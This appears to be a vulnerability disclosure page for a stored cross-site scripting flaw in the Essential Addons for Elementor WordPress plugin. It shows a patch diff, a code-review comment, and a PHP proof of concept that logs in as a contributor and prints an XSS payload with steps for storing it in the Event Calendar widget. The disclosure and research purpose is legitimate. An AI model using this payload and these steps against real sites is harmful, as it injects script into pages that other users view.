+		$show_category_child_items = ! empty( $settings['category_show_child_items'] ) && 'yes' === $settings['category_show_child_items'] ? 1 : 0;
+		$show_product_cat_child_items = ! empty( $settings['product_cat_show_child_items'] ) && 'yes' === $settings['product_cat_show_child_items'] ? 1 : 0;
+
+		$category_or_product_cat = '';
+		if ( 1 === $show_category_child_items && ! empty( $get_object_taxonomies ) && in_array( 'category', $get_object_taxonomies ) ) {
+			$category_or_product_cat = 'category';
+		}
+
+		if ( 1 === $show_product_cat_child_items && ! empty( $get_object_taxonomies ) && in_array( 'product_cat', $get_object_taxonomies ) ) {
+			$category_or_product_cat = 'product_cat';
+		}
+
+		if ( $category_or_product_cat ) {
+			$terms = get_the_terms( $post_id, $category_or_product_cat );
+			if ( $terms && ! is_wp_error( $terms ) ) {
+				foreach ( $terms as $term ) {
+					$parent_list = get_term_parents_list( $term->term_id, $category_or_product_cat, array( "format" => "slug", 'separator' => '/', "link" => 0, "inclusive" => 0 ) );
+					$parent_list = explode( '/', $parent_list );
+					$classes = array_merge( $classes, array_filter( $parent_list ) );
+				}
+			}
+		}
+
+		// Get categories
+		$categories = get_the_category( $post_id );
+		if ( $categories ) {
+			foreach ( $categories as $category ) {
+				$classes[] = $category->slug;
+			}
+		}
+
+		// Get tags
+		$tags = wp_get_post_tags( $post_id );
+		if ( $tags ) {
+			foreach ( $tags as $tag ) {
+				$classes[] = $tag->slug;
+			}
+		}
+
+		// Get product categories
+		$product_cats = get_the_terms( $post_id, 'product_cat' );
+		if ( $product_cats && ! is_wp_error( $product_cats ) ) {
+			foreach ( $product_cats as $cat ) {
+				if ( is_object( $cat ) ) {
+					$classes[] = $cat->slug;
+				}
+			}
+		}
+
+		// Add post name/slug
+		$classes[] = get_post_field( 'post_name', $post_id );
+
+		return array_unique( array_filter( $classes ) );
+	}
+
+	/**
 	 * Woo Pagination Product Ajax
 	 * get product list when pagination number/dot click by ajax
 	 *
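Review bot: in build_dfg_acf_taxonomy_map() `$_args['post_status'] = 'publish'` is set only inside the `if ( ! empty( $settings['post_type'] ) && $settings['post_type'] !== 'by_id' )` block, so when that condition fails the status inherited from `$args` (which can already be 'any', per the hunk's own comment about hybrid query encoding) is used and draft or private parent posts, plus their ACF gallery attachments, are enumerated and returned in post_ids; force the status unconditionally. The query is also unbounded (`posts_per_page = -1`) and then runs one get_field() per gallery key, one get_post() per URL-style item and up to five term lookups per parent in get_dfg_post_taxonomy_classes(), on every AJAX filter or load-more call; cache the result per (args, term) or cap it. Minor: get_dfg_post_taxonomy_classes() already collects every taxonomy slug via wp_get_object_terms() before separately re-adding categories, tags and product_cat, which the final array_unique() then hides; and `WP_Query`, `HelperClass` and `get_field()` are referenced unqualified, so confirm the trait's namespace has matching use statements (Event_Calendar.php above refers to the same helper as `Helper::`).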
--- a/essential-addons-for-elementor-lite/includes/Traits/Controls.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Controls.php
@@ -369,6 +369,22 @@
                         ]
                     ]
                 );
+
+                $wb->add_control(
+                    'eael_dfg_enable_combined_query',
+                    [
+                        'label' => __('Enable Combined Query', 'essential-addons-for-elementor-lite'),
+                        'type' => Controls_Manager::SWITCHER,
+                        'label_on' => __('Yes', 'essential-addons-for-elementor-lite'),
+                        'label_off' => __('No', 'essential-addons-for-elementor-lite'),
+                        'return_value' => 'yes',
+                        'default' => '',
+                        'description' => __('Combine filtered items with ACF gallery items.', 'essential-addons-for-elementor-lite'),
+                        'condition' => [
+                            'fetch_acf_image_gallery' => 'yes',
+                        ],
+                    ]
+                );
             } else {
                 $wb->add_control(
                     'eael_scf_gallery_warnig_text',
--- a/essential-addons-for-elementor-lite/includes/Traits/Core.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Core.php
@@ -45,7 +45,7 @@

         // go pro
         if (!$this->pro_enabled) {
-            $links[] = sprintf('<a href="https://essential-addons.com/bfcm-2025-plugins-wp" target="_blank" style="color: #000; font-weight: bold;">' . __('Save 40%% Today', 'essential-addons-for-elementor-lite') . '</a>');
+	        $links[] = sprintf('<a href="https://wpdeveloper.com/in/upgrade-essential-addons-elementor" target="_blank" style="color: #524cff; font-weight: bold;">' . __('Go Pro', 'essential-addons-for-elementor-lite') . '</a>');
         }

         return $links;
--- a/essential-addons-for-elementor-lite/includes/Traits/Enqueue.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Enqueue.php
@@ -110,7 +110,7 @@
         $src = EAEL_PLUGIN_URL . 'assets/admin/images/templately/logo-icon.svg';
         $css = "
 		.elementor-add-new-section .elementor-add-templately-promo-button{
-            background-color: #5d4fff;
+            background-color: #5d4fff !important;
             background-image: url({$src});
             background-repeat: no-repeat;
             background-position: center center;
--- a/essential-addons-for-elementor-lite/includes/Traits/Helper.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Helper.php
@@ -382,10 +382,11 @@
                             <img src="<?php echo esc_url( EAEL_PLUGIN_URL . 'assets/admin/images/templately/logo.svg' ); ?>" alt="">
                         </div>
                         <ul class="eael-promo-temp__feature__list">
-                            <li><?php esc_html_e('5,000+ Stunning Templates','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('6500+ Ready Templates','essential-addons-for-elementor-lite'); ?></li>
                             <li><?php esc_html_e('Supports Elementor & Gutenberg','essential-addons-for-elementor-lite'); ?></li>
-                            <li><?php esc_html_e('Powering up 300,000+ Websites','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('Powering up 4,00,000+ Websites','essential-addons-for-elementor-lite'); ?></li>
                             <li><?php esc_html_e('Cloud Collaboration with Team','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('1-Click Full Site Import','essential-addons-for-elementor-lite'); ?></li>
                         </ul>
                         <form class="eael-promo-temp__form">
                             <label>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69092 - Essential Addons for Elementor <= 6.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

/**
 * Proof of Concept for CVE-2025-69092
 * This script demonstrates stored XSS via the Event Calendar widget's details button text field.
 * Requires contributor-level WordPress credentials.
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Malicious payload to inject into the Event Details Button Text field
$payload = '"><script>alert(`Atomic Edge Research - XSS via ${document.domain}`)</script>';

// Initialize cURL session
$ch = curl_init();

// Step 1: Authenticate and get WordPress nonce
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);

$response = curl_exec($ch);

// Step 2: Create a new page with Elementor (GET request on the same authenticated session)
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post-new.php?post_type=page',
    CURLOPT_POST => false
]);

$response = curl_exec($ch);

// Extract nonce for Elementor AJAX (simplified - real implementation would parse HTML)
// In a real attack, the attacker would use the Elementor editor UI directly
// This PoC shows the vulnerable parameter and payload structure

echo "Vulnerable Parameter: eael_event_details_text\n";
echo "Payload: " . htmlspecialchars($payload) . "\n";
echo "\nAttack Vector:\n";
echo "1. Authenticate as contributor user\n";
echo "2. Create/edit page with Elementor\n";
echo "3. Add Essential Addons 'Event Calendar' widget\n";
echo "4. Set 'Event Details Button Text' to: " . htmlspecialchars($payload) . "\n";
echo "5. Save page - XSS payload is stored in database\n";
echo "6. Any user viewing the page executes the malicious script\n";

curl_close($ch);
?>
